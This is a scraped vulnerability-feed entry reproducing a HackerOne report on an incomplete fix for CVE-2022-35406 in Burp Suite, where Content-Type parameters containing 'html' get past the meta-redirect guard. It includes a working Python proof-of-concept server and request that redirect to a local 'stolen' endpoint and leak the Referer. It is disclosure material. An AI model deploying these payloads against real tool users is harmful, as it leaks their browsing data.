{“lastseen”:”2026-06-02T15:30:57″,”description”:”The fix for CVE-2022-35406 (#1541301) stops Burp from following a \\u003cmeta http-equiv=\\”refresh\\”\\u003e redirect when the response Content-Type\/Content-Disposition would prevent HTML rendering. The check substring-matches html in the raw Content-Type instead of parsing the media type. A text\/plain response can smuggle the token via a parameter (e.g. Content-Type: text\/plain; x=html), and Burp again offers and follows the meta redirect reintroducing the patched behaviour.\\n\\n## Root cause\\nThe content-type guard searches for the substring html in the raw header value rather than parsing the media type and discarding parameters. Any html token in a parameter name, value, quoted or not satisfies the check while the real MIME type stays text\/plain.\\n\\n### Steps to reproduce\\n1. server.py\\n“`\\n#!\/usr\/bin\/env python3\\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\\n\\nMETA = (‘\\u003chtml\\u003e\\u003chead\\u003e\\u003cmeta http-equiv=\\”refresh\\” ‘\\n ‘content=\\”0;url=http:\/\/127.0.0.1:9000\/stolen\\”\\u003e\\u003c\/head\\u003e\\u003cbody\\u003ex\\u003c\/body\\u003e\\u003c\/html\\u003e’)\\n\\nCASES = {\\n \\”\/ct_plain\\”: \\”text\/plain\\”, # control: blocked\\n \\”\/ct_param_plain\\”: \\”text\/plain; x=hello\\”, # control: blocked (no ‘html’)\\n \\”\/ct_param_html\\”: \\”text\/plain; x=html\\”, # BYPASS: followed\\n \\”\/ct_texthtml\\”: \\”text\/plain; x=text\/html\\”, # BYPASS: followed\\n \\”\/ct_quoted\\”: ‘text\/plain; x=\\”text\/html\\”‘, # BYPASS: followed\\n}\\n\\nclass H(BaseHTTPRequestHandler):\\n protocol_version = \\”HTTP\/1.1\\”\\n def log_message(self, *a): pass\\n def do_GET(self):\\n ct = CASES.get(self.path)\\n if ct is None:\\n self.send_response(404); self.send_header(\\”Content-Length\\”,\\”0\\”)\\n self.send_header(\\”Connection\\”,\\”close\\”); self.end_headers(); return\\n b = META.encode()\\n self.send_response(200)\\n self.send_header(\\”Content-Type\\”, ct)\\n self.send_header(\\”Content-Length\\”, str(len(b)))\\n self.send_header(\\”Connection\\”, \\”close\\”)\\n self.end_headers()\\n try: self.wfile.write(b)\\n except BrokenPipeError: pass\\n self.close_connection = True\\n\\nif __name__ == \\”__main__\\”:\\n print(\\”PoC server on http:\/\/127.0.0.1:8000\\”)\\n HTTPServer((\\”127.0.0.1\\”, 8000), H).serve_forever()\\n\\n“`\\n2. Run\\n\\n“ python3 server.py “\\n\\n3. In Repeater (HTTP\/1), send this request:\\n\\n“`\\nGET \/ct_param_html HTTP\/1.1\\nHost: 127.0.0.1:8000\\nReferer: http:\/\/127.0.0.1:8000\/secret-page\\nConnection: close\\n“`\\n\\n4. The response is Content-Type: text\/plain (with a bogus ; x=html parameter) containing a \\u003cmeta http-equiv=\\”refresh\\”\\u003e redirect. Despite the non-renderable text\/plain type, the Follow redirection button appears.\\n5. Click Follow redirection \u2192 Burp follows the meta redirect and issues the request to the redirect target, sending the Referer header.\\n6. (Control) Repeat with GET \/ct_param_plain (text\/plain; x=hello, no html token) \u2192 no Follow redirection button, not followed. This confirms the html substring is what triggers the bypass.\\n\\nClick Follow redirection:\\n\\n\\nPOC\\n{F6021058}\\n\\nIt discloses the referer header\\n\\n## Impact\\n\\nA text\/plain response that should be treated as non-renderable is again interpreted as a redirect in Repeater\/Intruder, re-enabling the meta-redirect follow that CVE-2022-35406 patched.”,”published”:”2026-06-01T17:41:12″,”modified”:”2026-06-02T15:02:57″,”type”:”hackerone”,”title”:”PortSwigger Web Security: Incomplete fix for CVE-2022-35406: meta-redirect content-type check bypassable via parameter injection”,”source”:””,”references”:””,”id”:”H1:3775183″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[“CVE-2022-35406″],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:4.3,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:U\/C:N\/I:L\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3775183″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-02T15:30:57″,”description”:”The fix for CVE-2022-35406 (#1541301) stops Burp from following a \\u003cmeta http-equiv=\\”refresh\\”\\u003e redirect when the response Content-Type\/Content-Disposition would prevent HTML rendering. The check substring-matches html…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,123,12,117,21,13,7,11,5],"class_list":["post-59212","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-cvss-43","tag-exploit","tag-hackerone","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n